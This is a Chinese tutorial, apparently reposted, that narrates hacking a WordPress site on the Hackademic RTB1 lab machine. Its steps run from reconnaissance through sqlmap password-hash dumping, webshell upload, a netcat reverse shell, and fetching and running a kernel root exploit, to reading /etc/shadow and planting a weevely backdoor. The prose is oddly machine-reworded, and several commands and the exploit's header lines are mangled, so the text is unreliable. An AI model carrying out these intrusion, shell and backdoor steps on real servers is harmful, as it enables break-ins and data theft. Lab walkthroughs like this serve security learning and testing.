上篇文案《黑客怎样攻破一个网站?图文讲解全流程》重点分享了网友对黑客攻击目的网站进行 seo 黑链处理的战争,本文将用图文讲解黑客攻破网站全流程。
内容源于华盟网
PS:一篇科普文,很适合小白,长文请静下心看。
经过本文你将认识黑客常用的入手思路和技术手法,适合热爱网络信息安全的新手伴侣认识学习。本文将从最起始的信息收集起始讲述黑客是怎样一步步的攻破你的网站和服务器的。阅读本文你会学到以下内容:
渗透测试前的简单信息收集。
sqlmap的运用
nmap的运用
nc反弹提权
linux系统的权限提高
backtrack 5中渗透测试工具nikto和w3af的运用等
假设黑客要入侵的你的网站域名为:hack-test.com
让咱们用ping命令获取网站服务器的IP位置
此刻咱们获取了网站服务器的IP位置为:173.236.138.113
寻找同一服务器上的其它网站,咱们运用sameip.org.
26 sites hosted on IP Address 173.236.138.113
ID
Domain
Site Link
1
hijackthisforum.com
hijackthisforum.com
2
sportforum.net
sportforum.net
3
freeonlinesudoku.net
freeonlinesudoku.net
4
cosplayhell.com
cosplayhell.com
5
videogamenews.org
videogamenews.org
6
gametour.com
gametour.com
7
qualitypetsitting.net
qualitypetsitting.net
8
brendanichols.com
brendanichols.com
9
8ez.com
8ez.com
10
hack-test.com
hack-test.com
11
kisax.com
kisax.com
12
paisans.com
paisans.com
13
mghz.com
mghz.com
14
debateful.com
debateful.com
15
jazzygoodtimes.com
jazzygoodtimes.com
16
fruny.com
fruny.com
17
vbum.com
vbum.com
18
wuckie.com
wuckie.com
19
force5inc.com
force5inc.com
20
virushero.com
virushero.com
21
twincitiesbusinesspeernetwork.com
twincitiesbusinesspeernetwork.com
22
jennieko.com
jennieko.com
23
davereedy.com
davereedy.com
24
joygarrido.com
joygarrido.com
25
prismapp.com
prismapp.com
26
utiligolf.com
utiligolf.com
173.236.138.113上有26个网站,非常多黑客为了攻破你的网站可能会检测同服务器上的其它网站,然则这次是以科研为目的,咱们将抛开服务器上的其它网站,只针对你的网站来进行入侵检测。
咱们需要关于你网站的以下信息:
DNS records (A, NS, TXT, MX and SOA)
Web Server Type (Apache, IIS, Tomcat)
Registrar (the company that owns your domain)
Your name, address, email and phone
Scripts that your site uses (php, asp, asp.net, jsp, cfm)
Your server OS (Unix,Linux,Windows,Solaris)
Your server open ports to internet (80, 443, 21, etc.)
让咱们起始找你网站的DNS记录,咱们用who.is来完成这一目的.
咱们发掘你的DNS记录如下
让咱们来确定web服务器的类型
发掘你的Web服务器是apache,接下来确定它的版本.
IP: 173.236.138.113
Website Status: active
Server Type: Apache
Alexa Trend/Rank: 1 Month:3,213,968 3 Month: 2,161,753
Page Views per Visit: 1 Month: 2.0 3Month: 3.7
接下来是时候寻找你网站域名的注册信息,你的tel、邮箱、位置等.
咱们此刻已然获取了你的网站域名的注册信息,包含你的重要信息等.
咱们能够经过backtrack5中的whatweb来获取你的网站服务器操作系统类型和服务器的版本.
咱们发掘你的网站运用了著名的php整站程序wordpress,服务器的的系统类型为FedoraLinux,Web服务器版本Apache 2.2.15.继续查看网站服务器开放的端口,用渗透测试工具nmap:
1-Find services that run on server(查看服务器上运行的服务)
2-Find server OS(查看操作系统版本)
仅有80端口是开放的,操作系统是Linux2.6.22(Fedora Core 6),此刻咱们已然收集了所相关于你网站的重要信息,接下来起始扫描寻找漏洞,比如:
Sql injection – Blind sql injection – LFI – RFI – XSS – CSRF等等.
咱们将运用Nikto来收集漏洞信息:
root@bt:/pentest/web/nikto# perlnikto.pl -h hack-test.com
咱们亦会用到Backtrack 5 R1中的W3AF 工具:
root@bt:/pentest/web/w3af#./w3af_gui
咱们输入要检测的网站位置,选取完整的安全审计选项.
稍等一会,你将会看到扫描结果.
发掘你的网站存在sql注入漏洞、XSS漏洞、以及其它的漏洞.让咱们来探讨SQL注入漏洞.
http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220
咱们经过工具发掘这个URL存在SQL注入,咱们经过Sqlmap来检测这个url.
Using sqlmap with –u url
过一会你会看到
输入N按回车键继续
咱们发掘你的网站存在mysql显错注入,mysql数据库版本是5.0. 咱们经过加入参数”-dbs”来尝试采集数据库名.
发掘三个数据库,接下来经过参数”-D wordpress -tables”来查看wordpress数据库的所有表名
经过参数“-T wp_users –columns ”来查看wp_users表中的字段.
接下来猜解字段user_login和user_pass的值.用参数”-C user_login,user_pass–dump”
咱们会发掘用户名和秘码hashes值. 咱们需要经过以下在线破解网站来破解秘码hashes
http://www.onlinehashcrack.com/free-hash-reverse.php
登陆wordpress的后台wp-admin
尝试上传php webshell到服务器,以方便运行有些linux命令.在插件页面寻找任何能够编辑的插件.咱们选取Textile这款插件,编辑插进咱们的php webshell,点击更新文件,而后拜访咱们的phpwebshell.
Phpwebshell被解析了,咱们能够控制你网站的文件,然则咱们只期盼得到网站服务器的root权限,来入侵服务器上其它的网站。
咱们用NC来反弹一个shell,首要在咱们的电脑上监听5555端口.
而后在Php webshell上反向连接咱们的电脑,输入你的IP和端口5555.
点击连接咱们会看到
接下来咱们尝试执行有些命令:
id
uid=48(apache) gid=489(apache) groups=489(apache)
(用来表示用户的id和组)
pwd
/var/www/html/Hackademic_RTB1/wp-content/plugins
(表示服务器上当前的路径)
uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 721:41:45 EST 2009 i686 i686 i386 GNU/Linux
(表示内核版本信息)
此刻咱们晓得,服务器的内核版本是2.6.31.5-127.fc12.1686,咱们在exploit-db.com中搜索此版本的关联漏洞.
在服务器上测试了非常多exp之后,咱们用以下的exp来提高权限.
http://www.exploit-db.com/exploits/15285
咱们在nc shell上执行以下命令:
wgethttp://www.exploit-db.com/exploits/15285 -o roro.c
(下载exp到服务器并重命名为roro.c)
注:非常多linux内核的exp都是C语言研发的,因此呢咱们保留为.c扩展名.
exp roro.c代码如下:
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define RECVPORT 5555
#define SENDPORT 6666
int prep_sock(int port)
{
int s, ret;
struct sockaddr_in addr;
s = socket(PF_RDS, SOCK_SEQPACKET, 0);
if(s < 0)
{
printf(“[*] Could not open socket.”);
exit(-1);
}
memset(&addr, 0, sizeof(addr));
经过以上代码咱们发掘该exp是C语言研发的,咱们需要将他编译成elf格式的,命令如下:
gcc roro.c –ororo
接下来执行编译好的exp
./roro
执行完成之后咱们输入id命令
id
咱们发掘咱们已然是root权限了
uid=0(root) gid=0(root)
此刻咱们能够查看/etc/shadow文件
cat/etc/shadow
咱们能够运用”john theripper”工具破解所有用户的秘码.然则咱们不会这般做,咱们需要在这个服务器上留下后门以方便咱们在任何时候拜访它.
咱们用weevely制作一个php小马上传到服务器上.
1.weevely运用选项
root@bt:/pentest/backdoors/web/weevely#./main.py -
2.用weevely创建一个秘码为koko的php后门
root@bt:/pentest/backdoors/web/weevely#./main.py -g -o hax.php -p koko
接下来上传到服务器之后来运用它
root@bt:/pentest/backdoors/web/weevely#./main.py -t -uhttp://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -pkoko
测试咱们的hax.php后门
完成,撒花!
热门文案举荐
服务器被黑遭攻击,凌晨一点紧急逆袭
除了霍金,咱们或许该记住并缅怀更加多人
互联网流量被BAT收割,区块链却要来收割巨头?
大众好,我便是区块链自己。今天,我要给你们介绍我的家族……
从零起始创建自己的区块链应用(JAVA版)
|